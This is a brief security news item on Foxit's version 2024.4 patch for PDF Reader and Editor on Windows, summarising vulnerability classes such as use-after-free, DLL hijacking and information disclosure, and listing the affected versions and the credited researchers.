Summary: Foxit has issued a critical security update for its PDF Reader and Editor to address multiple vulnerabilities, including risks of remote code execution and privilege escalation. Users are urged to upgrade to version 2024.4 to mitigate these threats.
Threat Actor: Unknown | unknown
Victim: Foxit Software | Foxit Software
Key Point :
- Untrusted URL Invocation allows attackers to embed malicious code in PDF documents.
- Incorrect Signature Verification can mislead users into signing altered XFA documents.
- Information Disclosure vulnerabilities enable exfiltration of sensitive data from file systems.
- Use-After-Free vulnerabilities can lead to application crashes and remote code execution.
- DLL Hijacking and Privilege Escalation can permit arbitrary code execution with SYSTEM privileges.
Foxit has released a crucial security update for its widely used Foxit PDF Reader and Foxit PDF Editor. The update, version 2024.4, resolves multiple vulnerabilities that pose significant risks, including remote code execution, privilege escalation, and information disclosure.
The security bulletin identifies several vulnerabilities affecting earlier versions of Foxit PDF Reader and Editor. These include:
- Untrusted URL Invocation: Attackers could exploit this flaw by embedding malicious code or images in PDF documents. As Foxit explained, “This occurs as the application loads images from all resources (including those untrusted) when parsing the image resources or fails to properly request user confirmation before getting or posting content from external HTTP servers.”
- Incorrect Signature Verification: Manipulated XFA documents could deceive users into signing altered documents. Foxit notes, “The application improperly ignores the changes to the ‘/NeedsRendering’ key or ‘TextField’ field when verifying the XFA documents.”
- Information Disclosure: Flaws in the “app.openDoc” and “LaunchAction” functions allowed attackers to exfiltrate sensitive data from the file system or SMB servers. The bulletin highlights that the application “fails to provide a reasonable prompt for user confirmation” in these scenarios.
- Use-After-Free Vulnerabilities: Certain AcroForms and 3D page objects could crash the application, enabling attackers to execute remote code. Vulnerabilities CVE-2024-49576 and CVE-2024-47810 were linked to this issue.
- DLL Hijacking and Privilege Escalation: Improper validation of secure search paths and update mechanisms could allow attackers to execute arbitrary code with SYSTEM privileges.
Foxit acknowledged contributions from security researchers, including Jörn Henkel, Mat Powell from Trend Micro Zero Day Initiative, and KPC of Cisco Talos.
The vulnerabilities impact:
- Foxit PDF Reader: Versions 2024.3.0.26795 and earlier.
- Foxit PDF Editor: A range of versions from 11.x to 2024.3.
These vulnerabilities affect Windows platforms, and users are encouraged to upgrade to version 2024.4 or later immediately.
Related Posts:
